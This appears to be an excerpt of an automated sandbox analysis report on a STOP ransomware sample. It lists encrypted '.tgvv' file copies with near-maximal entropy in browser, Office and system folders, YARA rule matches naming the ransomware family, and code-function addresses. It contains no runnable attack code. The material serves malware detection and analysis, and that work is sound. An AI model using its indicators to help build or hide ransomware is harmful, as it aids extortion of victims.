              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99840444964Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99834588968Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99873879207Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99859746422Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99861207687Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99801012151Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133521717815553933.txt entropy: 7.99828951398Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945529675005.txt entropy: 7.9983362719Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99878215669Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99744687963Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.998521228Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99361302163Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99763913196Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99839453678Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.99828953962Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99490975409Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99790967889Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\0.0.filtertrie.intermediate.txt entropy: 7.99567322208Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.ft entropy: 7.99645604647Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\setup32.exe_Rules.xml entropy: 7.99856370608Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99457191732Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session entropy: 7.99072521137Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.tgvv (copy) entropy: 7.99742901037Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.tgvv (copy) entropy: 7.99711931997Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.tgvv (copy) entropy: 7.9979150943Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.tgvv (copy) entropy: 7.99771315116Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF411.tmp.tgvv (copy) entropy: 7.9977529049Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.tgvv (copy) entropy: 7.99285644308Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.tgvv (copy) entropy: 7.99741583585Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.tgvv (copy) entropy: 7.99638531896Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.tgvv (copy) entropy: 7.99113190564Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\16.0\setup32.exe_Rules.xml.tgvv (copy) entropy: 7.99856370608Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.tgvv (copy) entropy: 7.99457191732Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.session.tgvv (copy) entropy: 7.99072521137Jump to dropped file

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000000.1641298642.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000000.1853038508.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000000.1771375510.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000002.1865701923.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000002.1800921924.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6828, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5776, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5644, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5104, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPEDMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1D2400_2_00F1D240
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F29F900_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F170E00_2_00F170E0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1C0700_2_00F1C070
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F150570_2_00F15057
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F180300_2_00F18030
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3F0100_2_00F3F010
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3E0030_2_00F3E003
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F121C00_2_00F121C0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F201600_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00FD81130_2_00FD8113
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F5237E0_2_00F5237E
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00FD93430_2_00FD9343
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F444FF0_2_00F444FF
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F184C00_2_00F184C0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F154570_2_00F15457
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F154470_2_00F15447
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F5B5B10_2_00F5B5B1
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F595060_2_00F59506
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F2E6900_2_00F2E690
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F196860_2_00F19686
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1A6600_2_00F1A660
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F5D7A10_2_00F5D7A1
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F187800_2_00F18780
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F127500_2_00F12750
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F167400_2_00F16740
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1F7300_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1A7100_2_00F1A710
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F168800_2_00F16880
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3C8040_2_00F3C804
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F169F30_2_00F169F3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F5D9DC0_2_00F5D9DC
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F919200_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F59A710_2_00F59A71
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F12B800_2_00F12B80
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F16B800_2_00F16B80
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F53B400_2_00F53B40
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F19CF90_2_00F19CF9
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F5ACFF0_2_00F5ACFF
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F19DFA0_2_00F19DFA
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1BDC00_2_00F1BDC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F37D6C0_2_00F37D6C
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1DD400_2_00F1DD40
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F16EE00_2_00F16EE0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3CE510_2_00F3CE51
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F59FE30_2_00F59FE3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F19F760_2_00F19F76
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F30F300_2_00F30F30
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F3E0032_2_00F3E003
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1D2402_2_00F1D240
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F2E6902_2_00F2E690
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1F7302_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F919202_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F29F902_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F170E02_2_00F170E0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1C0702_2_00F1C070
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F150572_2_00F15057
